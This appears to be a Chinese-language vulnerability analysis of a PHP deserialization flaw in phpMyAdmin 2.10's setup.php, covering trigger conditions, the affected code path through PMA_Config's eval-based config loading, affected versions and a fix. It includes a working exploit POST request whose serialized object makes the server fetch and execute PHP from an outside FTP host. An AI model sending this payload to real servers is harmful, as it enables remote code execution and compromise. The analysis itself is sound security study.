1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. "/scripts/setup.php"会接收用户发送的序列化POST数据action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2f%2f10.125.62.62%2fs.txt%22%3B%7D%7D/*token要动态获取action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}*/2. "/scripts/setup.php"会对"$_POST[‘configuration‘]"进行反序列化setup.php在反序列化的时候，程序未对输入的原始数据进行有效地恶意检测3. 黑客可以在POST数据中注入"序列化后的PMA_Config对象"setup.php在反序列化一个"序列化后的PMA_Config对象"的时候，会对这个对象进行"重新初始化"，即再次调用它的构造函数function __construct($source = null){    $this->settings = array();    // functions need to refresh in case of config file changed goes in    // PMA_Config::load()    $this->load($source);    // other settings, independant from config file, comes in    $this->checkSystem();    $this->checkIsHttps();}4. PMA_Config对象的构造函数会重新引入"$source"对应的配置文件，使用eval执行的方式将配置文件中的变量"本地变量注册化"function load($source = null){    $this->loadDefaults();    if (null !== $source) {        $this->setSource($source);    }    if (! $this->checkConfigSource()) {        return false;    }    $cfg = array();    /**     * Parses the configuration file     */    $old_error_reporting = error_reporting(0);    //使用eval方式引入外部的配置文件    if (function_exists(‘file_get_contents‘))     {        $eval_result = eval(‘?>‘ . trim(file_get_contents($this->getSource())));    }     else     {        $eval_result =        eval(‘?>‘ . trim(implode("\n", file($this->getSource()))));    }    error_reporting($old_error_reporting);    if ($eval_result === false) {        $this->error_config_file = true;    } else  {        $this->error_config_file = false;        $this->source_mtime = filemtime($this->getSource());    }    ...

http://php.net/manual/zh/function.unserialize.phphttp://drops.wooyun.org/papers/596http://drops.wooyun.org/tips/3909http://blog.csdn.net/cnbird2008/article/details/7491216

1. POSThttp://localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup.php2. DATAaction=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2f%2f10.125.62.62%2fs.txt%22%3B%7D%7D/*source要是一个外部的文本文件，需要返回的是原生的PHP代码a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}*/

1. phpmyadmin 2.102. <= phpmyadmin 2.10

if (isset($_POST[‘configuration‘]) && $action != ‘clear‘ ) {    // Grab previous configuration, if it should not be cleared    $configuration = unserialize($_POST[‘configuration‘]);} else {    // Start with empty configuration    $configuration = array();}

http://www.cnblogs.com/LittleHann/p/3522990.html搜索：0x22: PHP的序列化、反序列化特性布置后门 

if (!isset($_SESSION[‘configuration‘]) || $action == ‘clear‘) {    // Create empty configuration    $_SESSION[‘configuration‘] = array();}